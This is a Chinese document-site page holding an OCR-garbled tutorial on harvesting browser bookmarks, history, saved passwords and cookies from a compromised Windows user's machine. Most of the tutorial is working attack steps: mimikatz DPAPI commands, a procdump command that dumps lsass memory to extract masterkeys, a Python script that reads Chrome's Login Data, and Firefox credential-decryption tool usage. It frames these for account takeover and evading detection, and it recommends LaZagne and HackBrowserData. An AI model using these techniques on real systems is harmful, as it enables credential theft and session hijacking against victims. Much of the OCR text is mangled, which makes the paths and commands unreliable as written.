欢迎来到课桌文档! | 帮助中心 课桌文档-建筑工程资料库
课桌文档
全部分类
  • 党建之窗>
  • 感悟体会>
  • 百家争鸣>
  • 教育整顿>
  • 文笔提升>
  • 热门分类>
  • 计划总结>
  • 致辞演讲>
  • 在线阅读>
  • ImageVerifierCode 换一换
    首页 课桌文档 > 资源分类 > DOCX文档下载  

    2024获取浏览器相关敏感信息.docx

    • 资源ID:1341210       资源大小:185.77KB        全文页数:11页
    • 资源格式: DOCX        下载积分:5金币
    快捷下载 游客一键下载
    会员登录下载
    三方登录下载: 微信开放平台登录 QQ登录  
    下载资源需要5金币
    邮箱/手机:
    温馨提示:
    用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    2024获取浏览器相关敏感信息.docx

    获取浏览器相关敏感信息当我们获取特定用户的计算机权限后,为了深入分析目标的业务逻辑(浏览器访问行为),从而定位我们感兴趣数据或系统的位置,可以尝试收集该用户常用浏览器的访问书签、访问记录、cookie、保存的密码等敏感信息。0x00获取ChrOme浏览器保存的敏感信息OxOOa获取书签信息chrome浏览器的用书签保存在"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultBookmarks",该文件为json格式的文本文件,通过分析用户的书签,可以确定用户常访问的网站,从而找到可能存在关键数据的网站系统。本文均以test用户为例进行讨论OxOOb获取访问记录ChrOme浏览器的用户访问记录保存在"C:UserstestAppData1.ocalGoogleChromeUserDataHefauKHistory"的UrIS表中,该文件为SQlJte数据库文件,可以使用SQliteStiJdio打开直看。ASQUteStMdio(3.3.J)EurH(>to<y)0MAb>seStaictureVwTOeUHdp0A1ouF-XZ三OC三MW9X3。tB的累触发23IO1.V1Hi*tey(SQUteJ)2,T皿”(12)CrHviwFcrwi<BQ-OOOQQiQO.MXM帆IX3T.Ttlr<nIyiU'匚M*tAt.M4ttt4M>广¼v*14sUvltitleI1ChgmesoUCSDN-WlbTR*t三ft>1typ4a,catAtl*twvisatwtiaHidiM013266137266724072>匚3mloU«,aic«t22h*tpspasspo<tC5dn*t.CSDN皿ITBWtl13U1013266137266724072,4*ttlU.vl.4Uiks>匚knr1.r<k.tr33hpbdu,com怜帖设>悟金44hctpsvww.b*idu<on423132661510674458111132661犯达1650667>1.55tppMpoftcdnzwVH>A三三401326613753eS42C0066ht*mw.b>duxort.burp4ue<SP)S停止.三511W10132661M9M872071?7kctpswww.bdu<ons?.burp9uhe,工.国Ett10132661溺70042750广bhZZlkptZM.thftbook.da1113266146203147013>QViHMW99hetp1,threatbook.crv5/.-IXW2013266131W60117>E>ft>tE1010hnptJMhrtbookWvR一i三11亍In11ktp$y/27.152.ia5.l20/403Forbidden11013266146212491«8311326614625O16M261212EgUB笈电至同安全!M*.河晦至31U2661¼2921OM7可以使用上网行为分析工具对'C:UserstestAppData1.ocalGoogleChromeUserDatamefauRHistory”文件进行分析,研究用户的浏览器使用规律、常访问网站等言息,从而找到可能存在关键数据的网站系统、制定针对该用户的进一步分析利用方案。页面访问停留总时间排名编号停留时间网页地址1250小时2250小时https:/thunlpGNNPapers3230小时https:/juejin.impost5a672Ibd5125733201c4a24180小时https:/5170小时https:/6170小时7160小时140小时9140小时https:/arxiv.org/abs/1809.0567910130小时https:/11130小时http:/39.106.118.77/12120小时.-.-OxOOc获取保存的密码ChrOme浏览器会将用户保存的密码储存在"C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.oginData"的IoginS表中,该文件为SQ1.ite数据库文件,可以使用SQIiteStUdiO打开查看。SQUieSiudbo(MJ)1109mDMfQtebm>wcr100kPaSSWOr(1.VaIUe字段即为用户保存密码的密文,ChrOme浏览器不同版本的浏览器对应的加密方式不同。在80之前的版本,密码使用DPAPI加密;在80.x之后的版本,使用AES-256-GCM进行加密。也可以通过密文格式来判断加密方式,如果密文以“v10”或“v1T为前缀,则代表对应的加密方式为AES-256GCM.80.x之前在线获取密码可以使用神器mimikatz获取Chrome浏览器保存的密码,需要以test用户权限执行命令:mimikatz.exelogdpapi:chrome/in:"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultMoginData"/unprotectexit80.X之前离线获取密码ChrOme储存的明文密码时使用WindoWS提供的DPAPI进行对称加密来保证安全性。加解密的密钥称为masterkey有目标用户明文密码的情况首先我们需要定位解密ChrOme数据库对应的MaSterKey文件。使用Python脚本读取1.OginData并保存到文件中,代码如下:fromosimportgetenvimportsqlite3importbinasciiconn=sqlite3.connect("1.oginData")cursor=conn.cursor()cursor.execute('SE1.ECTaction-url,username_value,password_valueFROMlogins,)forresultincursor.fetchall():print(binascii.b2a_hex(result2)f=open('test.txt,wb,)f.write(result2)f.close()脚本执行后,提取1.oginData中保存的密文,保存为test.txt获得该密文对应的MaSterKeyfile,mimikatz命令如下:mimikatz.exedpapi:blob/in:test.t×texit获彳导又寸应guidMasterkey为alllb0f6-b4d7-40c8-b536-672a8288b958mimikatzttdpapi:blot)/in:c:ltest.txt*B1.OB*dwVersion00000001-1guidProviderdf9d8cd0-1501-lldl-8c7a-00c04fc297eb)dwMasterKeyVersion00000001-1guidMasterKealllb0f6-b4d7-40c8-b536-672a8288b958)dwFlags00000000-0()dwDescription1.en00000002-2SzDescriptionalgCrpt00006610-26128(CA1.G_AES_256)%dwAlgCrypt1.en00010-256dwSalt1.en00000020-32pbSaltC5b242bce8a08ba6e83376b0120fa28e88430a2ccd5e58e3f30665bd0900ebadwHmacKey1.en00000000-0pbHmackKeyalgHash0000800e-32782(CR1.G_SHA_512)dwAlgHash1.en00000200-512dwHmac2Ke1.en00000020-32PbHmdCk2Keyadfc4f753f2flf61dfe6042907dl0937e7db4abfeb407cabfa64f67192a8b95dwData1.en00000010-16pbData790249db2e4a74f755c44a27b5f39f2adwSign1.en00000040-64pbSign6efflc8bd30fl8600b3944e9ba8d31b7512155aea77ad3d4f5f76ec7Cd60535ce4eaeb5ac0b7d53ab99f98b04621ae56f5a6766709a293077730365fb7c05ef即MaSterKeyfile的路径为%APPDATA%MicrosoftProtect%SID%alllb0f6-b4d740c8-b536-672a8288b958MaSterKey保存在MaSterKeyfiie中,使用用户密码的SHAl密文加密(NT1.MhaSh使用MD4力口密),所以获取到用户的NT1.Mhash并不能解密MaSterKeyfile获取MaSterKey。在获取目标用户明文密码的情况下可以使用ChromePaSS离线获取Chrorne保存的密码C解密需要获得三部分内容:1 .加密密钥(即MaSterKey文件),位于appdata%MicrosoftProtect下对应Sid文件夹下的文件2 .数据库文件1.OginData("C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.oginData")3 .用户明文的密码,用于解密加密密钥由于ChrOmePaSS程序的设计问题,以上文件需要组成特定格式,子目录格式如下:AppData1.ocalGoogleChromeUserDataDefault1.oginDataAppDataRoamingMicrosoftProtectsid下保存key文件sid必须同原系统的对应例如子目录格式如下:C:l×23>di*ZsZb/a:aC:123XAppData1.ocalGoogleChroneUserDataDefault1.ogi11DataC:123ppDataRoaningMicrosoftProtectS-l-5-21-3453529135-4164765056-1075703908-1001329c4147-0011-4ad6-829d-e32dcbdlbbd?使用ChrOmePaSS选择该目录,填入用户明文密码,如下图没有目标用户明文密码的情况在没有用户明文密码的情况下,无法从MaSterKeyfile中获取MaSterKey,但是可以从ISaSS进程内存中提取MasterKeyo可以直接使用mimikatz获取MaSterKeymimikatz.exePriVilege:debug(需要管理员权限)sekurlsa:dpapiexit如下图mimikatzWprivilege:debugPrivilege'20'OKmimikatzHsekurlsa:dpapiAuthenticationSessionUserNameIdIDomain1.ogon1.ogonSIDServerTime00000000-GUID*Time*MasterKey0;18500103(00000000:011a4a07)InteractiMefrom2ba-PCA-PC20182J-.22:43:28S-l-5-21-2884853959-2080156797-250722187-1002alllb0f6-b4d7-40c8-b536-672a8288b958)2018/2/1422:57:14666638cbaea3b7cfldc55688f939e50eal002cded954aldl7d5fe0flJC90b7dd34677acl48aflf32caf828fdf7234bafbel4b39791b3d7e587176576d39c3fa70*Shdl(key):a3328800883339d6206ca972c97fcbe6c09728ee提取出MaSterKey为666638cbaea3b7cfldc55688f939e50eal002cded954aldl7d5fe0fbc90b7dd34677acl48aflf32caf828fdf7234bafbel4b39791b3d7e587176576d39c3fa70如果无法确保在目标环境上运行mimikatz不被发现,也可以使用proCdUmP等工具导出ISaSS进程内存,然后将文件下载回本螃取MaSterKey(与离线获取用户密码的方式一样)o导出ISaSS进程内存同样需要管理员权限:PrOCdUmp.exe-accepteula-maIsass.e×elsass.dmp使用mimikatz加载dmp文件,获取MaSterKey:mimikatz.exesekurlsa:minidumplsass.dmpsekurlsa:dpapi通过以上两种方式获取到MaSterKey后就可以使用mimikatz离线获取ChrOrne保存的密码。mimikatz.exelogdpapi:chrome/in:,'C:UserstestAppData1.ocalGoogleChromeUserDataDefault1.oginData"/unprotect/masterkey:666638cbaea3b7cfldc55688f939e50eal002cded954aldl7d5fe0fbc90b7dd34677acl48afIf32caf828fdf7234bafbel4b39791b3d7e587176576d39c3fa70exit80.X之后获取密码如上图所示80以后版本的Chrome使用原始密钥对密码明文进行了AES-256-GCM加密,并将原始密钥经过DPAPl力口密后储?¢了"C:UserstestAppData1.ocalGoogleChromeUserDataX1.ocaIState"文件的ebcrypted_key中。该文件为json格式的文本文件。T上elsctE31n:"easy_unlock.proximity_requiredn:false),Mhardware_acceleration_mode_previous":true,"incompatible_applicationsn:"ESETSecurity*':nallow_load*:true,nmessage_urlM:",Mregistry_is_hkcun:false,"registry_key_path":,SOFTWAREMicrosoftWwindowswcurrentversionWUninstallWB489BC2D-0079-4631-97BF-CA2378299D43)nrnregistry_wow64_accessn:256,"type*':0),"legacy":"profile":("name11:"migrated":true,nnetwork_time":"netWortimeapping":,localn:1.624719465750009e+12,"network":1.624719465415e+127nticks":893989786O59Tr"uncertainty":421993.0),"origin_trials":(“disabled.features1*:"SecurePaymentConfirmation"),"oscrypt":,encrypted_key,*:"RFBBUEkBAAAAOIydSwEV0RGMegDAT8KX6wEAAABMy6F9hR1.tQp4ZoWiw7Nq6ZkAAAAAIAAAAAABBmAAAAAQAAI7kAAAKOEz61.Djli0GsoRlMSftWaRWG5RKkPaymMENqzBznAAAAAA6AAAAAAgAAIAAAACbqxciGgiufICrTunKe3x6nc7mzfJZfHQAhWH0SX4vMAAAAGHMpIKViNbtNnZfSQZ1.HfjqP8Dy9xZOxnCOuChacRmTe8mzyThPwOUSjHQnlloUAAAACQxnwlGylVRCgW1.p8zjKCtCrhiWymY4utWa2g4工gtAkk85fsxk7IMdCECVrXB8H6p3G1.+DDu6nwh+31.y01"),"password_manager":',我们想要获取密码明文就需要先从json文件中获取ebcryPteC1.key.然后调用DPAPl进行解密获取原始密钥,再通过AES-256-GCM解密获取明文密码。新版mimikatz支持了80.x之后的ChrOme密码的获取,只需要添加/state:"1.ocalState文件”即可。例如在线获取保存的密码的命令为:mimikatz.exelogdpapi:chrome/in:"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultX1.oginData"/state:,C:UserstestAppData1.ocalGoogleChromeUserData1.ocalState"/unprotectexitOxOOd获取COokieCOokie通常也叫做网站COokie、浏览器COOkie或httpcookie,保存在浏览器端,它可以用来做用户认证、服务器校验等使用文本数据可以处理的问题。cookie机制可以弥补http协议无状态的缺点,在SeSSion出现之前,很多网站都采用CoOkie来跟踪会话。cookie实际是一段文本信息,当客户端请求服务器时,如果服务器需要记录该用户状态,response就向客户端颁发一个cookie,客户端会把cookie保存起来,浏览器再次请求该网站时,客户端连同该cookief给服务器,服务器检查该Cookie以辨认用户状态。当我们确定用户拥有某个我们感兴趣的网站凭证,但是无法获取到用户保存的密码或者网站使用二次验证,我们就可以尝试窃取用户的cookie来模拟用户的请求行为,此时服务器无法辨别客户端的请求来自用户还是攻击者,我们就获取了目标用户的账号控制权。ChrOme浏览器的COOkie保存在"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultCookies,该文件为SQ1.ite数据库文件,可以使用SQliteStUdi。打开有看。三三三ii2>tKi*wM<Sa.Iu.*u>tt46*<>m*riHMJbCCOUMT.tRSS/10t16*S¼2416M3,©-1/nwoooooo001UMlMeU411Wt11T0n*,y/13016HfiOT9MM001WtMM4HWI11.I-NV2DG5"-59BJUOUC/0。1½<4tMM24MM111«10«Sfj"W7M"6/1MM211MMM)001MW1MW241MU111ro<«P.*w)*4E.O.bedGl4Mc-f3,6MWOOooO00IUe6,f11r”.£/1M97eTM*J000000001UC61M0U41WSOt»1Tg*gy-"/1U977M*mC000001½U1MW41HWI1,70.d.m1.R*.*BOUPO/142?52«OM200000000I»ea”Gw./nai)6MMco00IUMlMMMUMI1ImJl2z11uq*/八acooo001UM1M0U411M1111ftn<X1.<CCCd*CA*¼/1U97tt22M0K0000。«>,g©«*Qyt>COOK<.suM/1M7MTOMOOOO001UM1S4M241M¼»11TO1«&(-”-Bwnodjo,IuaiMmroooooo001Ue61M6Ul42014t112N6F-MWd.*M291V1CM*TOOOOOO001UC41M0V1W1O11%10*jU.69f-“y»M)Cj1£THdrmmMencrypteC1.VaIUe即为力密后的COOkie值密文,加花方式同ChrOme保存的密码,可参考上文进行获取。例如在线获取80.x版本之前的ChrOme保存的Cookie信息可以使用mimikatz以test用户权限执行如下命令:mimikatz.exeIogdpapi:chrome/in:"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultXCookies"/unprotectexit0x01获取firef。X浏览器保存的敏感信息默认情况下,firefox浏览器的用户配置信息保存在C:UserstestAppDataRoamingMozillaFirefoxProfilesxxxxxxxx.default中。其中"xxxxxxxx”为8位随机字母和数字的组合,可以进入"C:UserstestAppDataRoamingMozillaFirefoxProfiles"文件夹进行查看。0x01a查看基本信息命令行下查看firefox版本信息的方法:type,C:ProgramFilesXMozillaFirefOX'application.ini"findstrVer#或者type"C:ProgramFiles(×86)MozillaFirefoxXapplication.ini"IfindstrVer判断FirefoX浏览器版本:64位FirefoX浏览器的默认安装目录为C:ProgramFilesXMozillaFirefox32位FirefOX浏览器的默认安装目录为C:ProgramFiles(×86)MozillaFirefoxOXOlb获取书签信息firefox浏览器的书签储存在PlaCeS.sqlite的moz_bookmarks表中,相关UR1.信息存储在"moz_places"表中,该文件为SQ1.ite数据库文件,可以使用SQIiteStUdi。打开查看。WSQ1.XeStudio(13.3)-<noz-boofcynrks(PiMeSH-QUbMStructureYw100HHpZ4fcSX>jF-KKZ:2一二二C®S9X编仲新搦n三*aM的发aDO1.P143"(SQlitt3)、r-TiM”(三)Grid<i«vaaO<CK×>it>4u.ITtdrw*1*4:13I二*.aaattribt,>广M.tan1a11tyr«par«<t2NUU0title0byvrUNU1.1.£«14ar_t>j%tA44l«stik4i£i«4K«i415820348743000016249026933770root(F'ajb4S,222N.:10menuNU1.1.1582034874MmOoO1582034874741000menuB»K<u>332V.11toolbarWU1582034874X)60003490283377000toolbar_“Inita«i(三)J三>1.(MJb4tl41c4广.>Jkist«ryvititf1.ttry>*I->442WU12togsNUU1203474J0600012034874J06000565662NUU1213Unfiwd4mobile15820347430000158203474727000UMiud_1S8203487449B01582034874727000mobile772M一,20MozM.Firefox15820348747410001582034S74741000IUTJfFSHMdEk881170IWyWW1582034747410001582034874741000R3y8pnRw<up1.*swkyvr4(991271B三ZKre4M15820348747410001双DMa74741000SSJXeWOPD>£_<MSJbt>厂*z,r>pM10ioIlH1371472-3WU15820348747410001$820348747410TEkYMxPxug15820348747410001S820348747410TuBefevnbIMv匚*zlr*12121530新手上第158203474796000158203474796000Nna1UQdb«hQ9H字段g今InxtGJM%3卓ViE13131931Fecebook-logInorSignUp1624902WJ3770001624902695377000plw62vMH7U3VI>1M*(fviP&3“m,匚.ttr¼to».*,CAU«*,Cr>4rH.¼lti>C>bMBurrriiU匚R*U*F匚3S*.*,ljB4fi*0x01C获取访问记录firefox浏览器的用户访问记录保存在PIaCeS.sqlite的moz_PIaCeS表中,该文件为SQ1.ite数据库文件,可以使用SQIiteStlJdio打开查看。可以使用firefox-history-spy对访问记录进行分析。Sx*ylMt.*ait.4t.41QUKy*oow,Wm<MMCQ1*09ISM9018¼01K*H9000*aA*M119db251624WWHJOOONMM*M2xU181624e0M7M0JO001CtfNXXwiftNO”1«24901107110000r<WlMOO0x01d获取保存的密码解密流程1 .读取密钥文件(key4db或key3db),获得key和2(初始化矢量)2 .读取记录文件(IoginSJson或SignOnS.sqlite)的内容3 .如果未设置MaSterPassword,使用ke丽iv对记录文件中的加密内容进行3DES-CBC解密。如果设置MaSterPassword,还需要获得明文形式的MaSterPassword,才能进行解密需要获取的文件离线导出firefox保存的凭证需要获取目标计算机上的记录文件以及密钥文件。记录文件: VerSiOn大于等于32.0,保存记录的文件为IOginSJson VerSiOn大于等于3.5,小于32.0,保存记录的文件为SignOnS.sqlite记录文件中,encryptedUsername和encryptedPassword是力口密的内容,解密需要获得密钥文件(key和iv)并作3DES-CBC解密。不同版本的FirefoX密钥文件的位置不同:VerSion小于58.0.2,密钥文件为key3.db-VerSiOn大于等于58.0.2,密钥文件为key4.db未设置MaSterPaSSWOrd时离线导出推荐使用fM离线获取保存的密码:py-2firepwd.py-d记录文件与密钥文件所在文件夹其它的可用工具:1. WebBrowserPassViewexe2. 1.aZaane3. firefoxdecrv”4. 直接使用firefox浏览器加载配置文件firefox.exe-profile记录文件与密钥文件所在文件夹设置了MaSterPaSSWOrd时离线导出为了提高安全性,FirefoX浏览器支持为保存的密码添加额外的保护:设置MaSterPassworde设置了MaSterPaSSWord后,解密流程如下:1 .加载NetWOrkSecuritySerViCeS需要的nss3.dll2 .调用NSSJnitO进行初始化3 .调用PKll_GetlnternaIKeySIot()来获得internalslot(用作iEMaSterPassword)4 .调用PKIl_CheckUserPassword()验证MaSterPassword5 .读取IOginS.json获得加密数据6 .调用PKlISDRDecrypt。进行解密设置了MaSterPaSSWOrd后,使用firefox浏览器直接加载配置文件后输入正确的MaSterPaSSWOrcl也可以获取到保存的凭证。使用工具firefoxdecrypt离线导出保存的凭证,除了需要记录文件和密钥文件外,还需要cert9db,该文件保存在与记录文件相同的文件夹中,该文件并非必须是目标计算机上的,本地的cert9.db文件也可使用。将这三个文件保存在相同文件夹下,然后运行如下命令即可导出保存的凭证:echo'MasterPassword,py-2firefox_decrypt.py配置文件保存路径在64位系统下,Python和FirefoX的版本需要保持一致(同为32位或者同为64位),否则会提示ERRoR-Problemsopening,nss3.dlrequiredforpassworddecryption,0x01e获取COOkiefirefox浏览器的用户访问记录保存在COokie.sqlite的moz_cookies表中,该文件为SQ1.ite数据库文件,可以使用SaIiteStIIdio打开查看。0x02其他浏览器&&神器推荐出来上面提到的两款浏览器,我们在实战中可能会遇到其他的浏览器,可以在本地安装与目标相同版本的浏览器进行测试分析,制定收集浏览器敏感信息的方案。推荐两款神器:1.aZaqne可以获取二十多个浏览器的相关信息。1.aZagne使用Python编写,有较好的跨平台性,但是有时候如果目标机器上没有Py环境,我们可以把Py转换成exe扔到目标机器上运行。HaCkBrOWSerData是一个解密浏览器数据(密码|历史记录|C。Okiel书签|信用卡|下载记录)的导出工具,支持全平台主流浏览器。HaCkBrOWSerData使用g。开发,我们同样可以生成exe放在目标计算机上执行。

    注意事项

    本文(2024获取浏览器相关敏感信息.docx)为本站会员(夺命阿水)主动上传,课桌文档仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知课桌文档(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    备案号:宁ICP备20000045号-1

    经营许可证:宁B2-20210002

    宁公网安备 64010402000986号

    课桌文档
    收起
    展开